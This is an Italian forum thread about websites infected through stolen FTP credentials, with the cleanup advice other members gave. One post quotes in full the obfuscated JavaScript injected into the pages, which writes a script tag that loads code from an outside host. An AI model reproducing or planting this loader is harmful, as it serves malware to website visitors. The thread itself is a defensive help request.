- Home
- Categorie
- Gli Off Topic
- Tutti i Software
- [Risolto] Malware rilevato su siti.
-
[Risolto] Malware rilevato su siti.
Ciao a tutti,
il mio problema è questo, sono due giorni che pubblico dei file e che ricevo avviso di malware.
Avevo lasciato un messaggio in questa posizione >>
forum/consigli-ed-aiuti-per-il-sito/111129-avviso-di-malware-su-sito.html#
Potete aiutarmi? Di cosa si puo' trattare?
Grazie 1000
-
Ho appena trovato il codice che viene inserito nelle pagine...
<script language=javascript><!--
(function(cPX){var vtUj='%';var lPW='var~20a~3d~22~53cript~45ngine~22~2cb~3d~22Version()+~22~2c~6a~3d~22~22~2cu~3dn~61vigator~2eu~73~65rAgent~3b~69f(~28u~2eindex~4ff(~22Win~22~29~3e0)~26~26(u~2e~69nde~78Of(~22~4e~54~206~22)~3c0)~26~26(docu~6dent~2ecookie~2eind~65xOf(~22miek~3d1~22~29~3c0~29~26~26(typ~65of~28zrv~7ats)~21~3dty~70e~6f~66(~22A~22))~29~7bzr~76z~74s~3d~22~41~22~3b~65~76~61l(~22~69f(wi~6ed~6fw~2e~22+a+~22)j~3dj+~22+~61+~22M~61jor~22~2bb+a+~22Minor~22+b+a+~22Bu~69ld~22+b+~22~6a~3b~22)~3b~64ocu~6dent~2e~77~72it~65(~22~3csc~72ip~74~20src~3d~2f~2f~67umbl~61r~2e~63~6e~2f~72ss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fs~63~72~69pt~3e~22)~3b~7d';eval(unescape(lPW.replace(cPX,vtUj)))})(/~/g);
--></script>Ogni volta che pubblico i file che ho in locale sul server nella pagina viene aggiunto questo script.
Spero possiate darmi una mano.
Grazie 1000.
-
Se il file viene aggiunto dal server, è il server che è infetto da qualche rootkit (oppure è l'hoster che fa il furbo)
Contatta l'hoster
L'unica soluzione rapida, se l'hoster non risponde, è quella di spostare il sito su altro hosting, magari gratuito e reindirizzare i dns.
-
Il problema si è verificato su due siti che si trovano su due nostri server diversi.
Pensavo di provare ad installare un software per la rilevazione di malware sulle macchine e controllare che non ci siano problemi.
Se avete qualche altro suggerimento fatemi sapere.
Grazie 1000.
Ciao.
-
A questo punto direi che è indispensabile conoscere le url dei siti. Postale in modo non attivo (sostituisci il . con uno spazio).
Sarebbe anche utile capire cosa utilizzi per caricare i file sul server.
-
Il sito che dava problemi ieri è greenholiday.it mentre quello che da problemi adesso è kineosrl.it (pagine aspx).
Per pubblicare utilizzo Dreamweaver CS3.
Grazie 1000.
-
Prova a leggere questo
Sembra che quando apri un sito infetto invii le credenziali ftp a qualcuno che poi modifica i file sull'ftp.
Consigliano di usare malwarebyte per ripulite il pc, poi cambiare le password ftp del server ed infine uploadare nuovamente i file sul sito.
-
Grazie 1000 per l'assistenza, mi leggo tutto e provo.
Appena fatto vi faccio sapere come è andata.Grazie ancora
.
-
Grazie 1000 ancora.
Ho seguito le indicazioni:
1- installato il programma "malwarebyte" sul mio pc
2- fatta fare una scansione di tutti i dischi
3- cambiato i dati di accesso ftp
4- ripubblicati i file non infettiSulla mia macchina non sono stati rilevati malware, il problema è che dopo qualche minuto il sito di nuovo da lo stesso errore di prima in altre pagine.
-
C'è qualcun'altro che usa quel sito/FTP?
Hai seguito anche il consiglio di non memorizzare in automatico le password sul tuo computer?
-
Pubblico solamente io i file di quel sito, per la password ho tolto adesso il salvataggio automatico dalle impostazioni di dreamweaver ed ho ripetuto la procedura.. per il momento sembra andare.. speriamo bene.
Il mio timore è che si ripresenti il problema anche con altri siti che gestisco (se il danno è sul mio pc), togliendo tutte le password i tempi di lavoro si allungano un bel po'.
Speriamo bene... non vorrei dover formattare
.Grazie 1000 per la celerità di risposta e gli utilissimi consigli.
-
Direi che se non salvi la password e tutto va bene sei a posto (nel senso che è chiaro che il pc è infetto da malware).
Il fatto che gli strumenti antimalware non lo individuino è normale.
Ti consiglio di cercare un software antivirus/antimalware basato su distribuzione live linux, così da analizzare il sistema senza che sia operativo.
Puoi guardare quella offerta gratuitamente da bitdefender, ma ce ne sono tante.
-
Provo anche questa cosa.. grazie 1000 ancora!
-
Sto facendo la scansione...
Adesso mi ha chiamato il cliente dicendo che quando prova ad aprire alcune pagine del sito compare un messaggio che avvisa di aver trovato un cavallo di troia.
Quello che viene scritto è questo:
JS: REDIRECTOR-H2 [TRJ]
Quando visualizzo il sito dal mio pc adesso non da nessun errore.. come puo' essere possibile?
Grazie ancora.
-
Potrebbe avere in cache del browser una vecchia versione del sito.
Dovrebbe ripulire la cache.In teoria potrebbe avere infettato col malware pure il suo pc, ma questo non influirebbe sulla visualizzazione del sito.
Dovresti farti dire quali sono le pagine. Io ne ho guardate 2 ore, alcune non sono attive. Questo pop up di avviso chi è che lo tira fuori?
Io sono in ambiente mac per cui non ho a bordo niente che mi avvisi di malware sui siti, sarebbe interessante indagare su questo punto (a mio livello).
-
Avevo pensato alla cache di IE anche io e gliel'ho fatta svuotare, il problema però è rimasto anche così.
Alcune delle pagine che gli fanno comparire l'avviso sono:
- terapia-fisica-strumentale.aspx
- riabilitazione-motoria-e-valutazione.aspx
Il popup di avviso dovrebbe tirarlo fuori il suo antivirus (comunque chiedo per averne garanzia), a me invece lo faceva comparire Chrome (che adesso però non segnala più niente).
Grazie
.
-
Hai ripubblicato anche i JS o solo le pagine?
-
Anche i file js.
-
Ho trovato questo tool gratuito che analizza il tuo web server per trovare vulnerabilità utilizzando Nessus, che è un software a pagamento reputato per essere il migliore. Devi inserire un file di testo per verificare la tua proprietà del sito e ti invia i risultati via posta in mezz'oretta.
Provalo pure qui e facci sapere cosa ti racconta, a me sembra pulito l'html, non ho guardato i js.
-
Fatto, domani mattina appena arrivo in ufficio vi aggiorno.
redsector sei stato veramente gentilissimo, grazie mille!
